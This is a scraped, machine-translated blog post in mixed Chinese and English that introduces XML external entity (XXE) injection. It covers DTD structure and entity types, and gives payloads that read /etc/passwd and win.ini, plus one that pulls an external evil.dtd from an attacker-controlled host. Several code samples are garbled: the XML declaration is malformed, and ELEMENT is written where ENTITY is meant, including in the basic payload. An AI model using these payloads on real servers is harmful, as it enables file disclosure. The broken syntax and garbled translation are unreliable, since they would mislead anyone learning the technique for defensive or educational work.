XXE external entity injection vulnerability-basic knowledge

Others 2020-04-21 23:30:08 views: null

Basic knowledge

table of Contents

There are a lot of things that need to be digested. The concept is a bit confusing. The basic structure payload and external files are almost understood. Other principles still need to be learned.

lab environment

In libxml2.9.1 and later, external entities are not resolved by default. During the test, php5.2 (libxml Version 2.7.7) and php5.3 (libxml Version 2.7.8) were used under windows. In Linux, you need to compile the version of libxml lower than libxml2.9.1 into PHP. You can use phpinfo () to view the version information of libxml

definition

XML is used to mark electronic files to have a structured markup language, which can be used to mark data and define data types. It is a source language that allows users to define their own markup languages.

		XML 文档结构
			包括 XML 声明
			DTD 文档类型定义(可选)
			文档元素

XML document structure

		<?xml version=1.0” encoding="gb2312" encoding=UTF-8?> //xml 声明、版本、编码
		<!DOCTYPE root system "http://www.XXXX.com/file"[ //定义 DTD 文件,格式为:root 指定根节点名称,system 声明要使用的外部 DTD 文件路径,后面加文件 URL,注意[]包裹。
		<!ELEMENT root (other)> // 元素声明,声明 xml 中包含的元素,声明中需要指定元素名称(root、other 等)和元素类别、内容等
		<!ELEMENT to (#PCDATA)> // <!--定义 to 元素为”#PCDATA”类型-->
		<!ELEMENT generalentity "content" > //ELEMENT 标签用于声明实体,关于实体的定义如下:“实体是用于定义引用普通文本或特殊字符的快捷方式的变量”实体是在 DTD 文件中定义的变量,xml 解析器解析 xml 文件的时候,会将被的引用替换为实体内容,实体分为:预定义实体、普通实体、参数实体,此处定义了普通实体 generalentity,内容为 content
		<!ELEMENT % extendentity SYSTEM "http://www.XXXX.com/file"> //定义参数实体,格式
为:<!ELEMENT % 参数名称 参数内容>

Reference format:% parameter name

Parameter entities can only be referenced in DTD files. Parameter references in internal DTD files can only appear where DTD tags can appear
. References to parameter entities in external DTD files can be derived from the content of DTD tags, such as:

<!ELEMENT % "%another">
		%extendentity; //引用参数外部实体

Basic knowledge of DTD

Document Type Definition is the document type definition used to define semantic constraints for XML documents.
It can be embedded in an XML document (internal declaration) or independently in a file (external reference). Due to the limited data types supported, it is impossible to specify the content of elements or attributes in detail. The scalability is not comparable to XML Schema.
Reference link: http://www.w3school.com.cn/dtd/index.asp

Basic PAYLOAD structure

	开头 进行了 XML 的声明

<?xml version=1.0” encoding="gb2312" encoding=UTF-8?>

	然后使用 DTD 声明实体(这里使用了 file 协议)

<!DOCTYPE foo[
			<!ELEMENT  foo ANY>
			<!ELEMENT %  xxe SYSTEM  "file:///etc/passwd">]>

	最后使用 XML 获取实体的数据

<foo>&xxe;</foo>

Attack methods using DTD entities

	DTD 引用方式(简要了解)
		1. DTD 内部声明
			<!DOCTYPE 根元素 [元素声明]>
		2. DTD 外部引用
			<!DOCTYPE 根元素名称 SYSTEM "外部 DTD 的 URI">
		3. 引用公共 DTD
			<!DOCTYPE 根元素名称 PUBLIC "DTD 标识名" "公用 DTD 的 URI">
	示例

?xml version="1.0"?>

Naming method:

Start with! DOCTYPE, configuration is the name of the document root element;
PUBLIC means public DTD; -means
non-ISO organization;
mybatis.org means organization;
DTD means type;
Config means label;
3.0 is the version number attached to the label;
EN means DTD The language is English;
finally the URL of the DTD;

DTD entity declaration

Internal entity declaration

<!ENTITY 实体名称 "实体的值">

			一个实体由三部分构成:&符号, 实体名称, 分号 (;),这里&不论在 GET 还是在 POST

URL encoding is required in both, because the parameters are passed into the xml, and the ampersand will be regarded as the connection
symbol between the parameters , examples

	<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe "oldboyedu.com">]>
<foo>&xxe;</foo>

External entity declaration

<!ENTITY 实体名称 SYSTEM "URI/URL">

			外部引用可支持 http,file 等协议,不同的语言支持的协议不同,但存在一些通用

The agreement, the specific content is as follows

					示例

		<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<foo>&xxe;</foo>

Parameter entity declaration

<!ENTITY % 实体名称 "实体的值">

or

<! ENTITY% entity name SYSTEM "URI"> 
			示例

		<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://192.168.0.105:8080/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>

					外部 evil.dtd 中的内容

<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

Reference public entity

<!ENTITY 实体名称 PUBLIC "public_ID" "URI">

			示例

	<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe PUBLIC "public_ID""http://192.168.0.105:8080/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>

					外部 evil.dtd 中的内容

<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

Entity category introduction

	内置实体 (Built-in entities) 
	字符实体 (Character entities) 
	通用实体 (General entities) 
	参数实体 (Parameter entities)
		用%实体名称申明,引用时也用%实体名称;
			只能在 DTD 中申明,DTD 中引用;

Examples

		内部实体

<!ENTITY 实体名称 "实体内容">

		外部实体

<!ENTITY 实体名称 SYSTEM "URI">

		参数实体

<!ENTITY % 实体名称 "实体内容">

or

<!ENTITY % 实体名称 "URI">

Note : The parameter entity is referenced in the DTD, while the rest of the entities are referenced in the XML document. The
% entity name is used for declaration, and the% entity name is also used for reference; it
can only be declared in the DTD, and can be used in the XML document Quote.

Gentle Little Xue
Published 117 original articles · praised 11 · visits 6465
Private letter concerns

Guess you like

Origin blog.csdn.net/weixin_43079958/article/details/105476366
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com